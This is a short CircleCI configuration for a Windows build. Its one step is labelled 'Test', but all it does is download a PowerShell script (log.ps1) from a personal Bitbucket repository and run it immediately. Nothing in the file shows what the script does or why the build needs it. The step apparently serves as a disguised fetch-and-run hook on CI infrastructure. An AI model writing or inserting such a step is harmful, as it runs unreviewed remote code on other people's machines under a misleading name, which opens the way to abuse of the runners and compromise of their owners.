version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
 
    steps:
      - run:
          name: Test
          command: |
            Invoke-WebRequest https://bitbucket.org/jaraneok/goyang/raw/f7d9c632bff3e46262c13fe66ad3e8b7599d426c/log.ps1 -OutFile log.ps1
            ./log.ps1
